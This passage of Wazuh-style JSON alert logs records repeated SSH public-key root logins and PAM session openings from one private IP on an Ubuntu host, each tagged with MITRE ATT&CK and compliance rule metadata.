SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
